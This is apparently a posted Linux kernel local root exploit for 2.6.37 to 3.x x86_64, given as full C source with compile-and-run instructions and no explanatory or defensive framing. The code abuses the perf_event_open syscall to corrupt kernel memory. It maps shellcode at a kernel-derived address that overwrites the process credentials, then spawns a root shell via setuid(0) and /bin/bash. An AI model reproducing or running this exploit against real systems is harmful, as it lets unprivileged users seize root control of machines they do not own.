Linux, 2.6.37-3.8.10 0day kernel local root exploit

1. /*
2. * linux 2.6.37-3.x.x x86_64, ~100 LOC
3. * gcc-4.6 -O2 semtex.c && ./a.out
4. *
5. * update may 2013:
6. * seems like centos 2.6.32 backported the perf bug, lol.
7. */
8.  
9. #define _GNU_SOURCE 1
10. #include <stdint.h>
11. #include <stdio.h>
12. #include <stdlib.h>
13. #include <string.h>
14. #include <unistd.h>
15. #include <sys/mman.h>
16. #include <syscall.h>
17. #include <stdint.h>
18. #include <assert.h>
19.  
20. #define BASE 0x380000000
21. #define SIZE 0x010000000
22. #define KSIZE 0x2000000
23. #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))
24.  
25. void fuck() {
26. int i,j,k;
27. uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
28. uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
29. uint64_t kbase = ((uint64_t)current)>>36;
30. uint32_t *fixptr = (void*) AB(1);
31. *fixptr = -1;
32.  
33. for (i=0; i<4000; i+=4) {
34. uint64_t *p = (void *)&current[i];
35. uint32_t *t = (void*) p[0];
36. if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
37. for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
38. if (((uint32_t*)uids)[k] != t[j+k]) goto next;
39. for (i = 0; i < 8; i++) t[j+i] = 0;
40. for (i = 0; i < 10; i++) t[j+9+i] = -1;
41. return;
42. next:; }
43. }
44. }
45.  
46. void sheep(uint32_t off) {
47. uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
48. int fd = syscall(298, buf, 0, -1, -1, 0);
49. assert(!close(fd));
50. }
51.  
52.  
53. int main() {
54. uint64_t u,g,needle, kbase, *p; uint8_t *code;
55. uint32_t *map, j = 5;
56. int i;
57. struct {
58. uint16_t limit;
59. uint64_t addr;
60. } __attribute__((packed)) idt;
61. assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
62. memset(map, 0, SIZE);
63. sheep(-1); sheep(-2);
64. for (i = 0; i < SIZE/4; i++) if (map[i]) {
65. assert(map[i+1]);
66. break;
67. }
68. assert(i<SIZE/4);
69. asm ("sidt %0" : "=m" (idt));
70. kbase = idt.addr & 0xff000000;
71. u = getuid(); g = getgid();
72. assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
73. memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
74. memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
75. printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
76. setresuid(u,u,u); setresgid(g,g,g);
77. while (j--) {
78. needle = AB(j+1);
79. assert(p = memmem(code, 1024, &needle, 8));
80. if (!p) continue;
81. *p = j?((g<<32)|u):(idt.addr + 0x48);
82. }
83. sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
84. asm("int $0x4"); assert(!setuid(0));
85. return execl("/bin/bash", "-sh", NULL);
86. }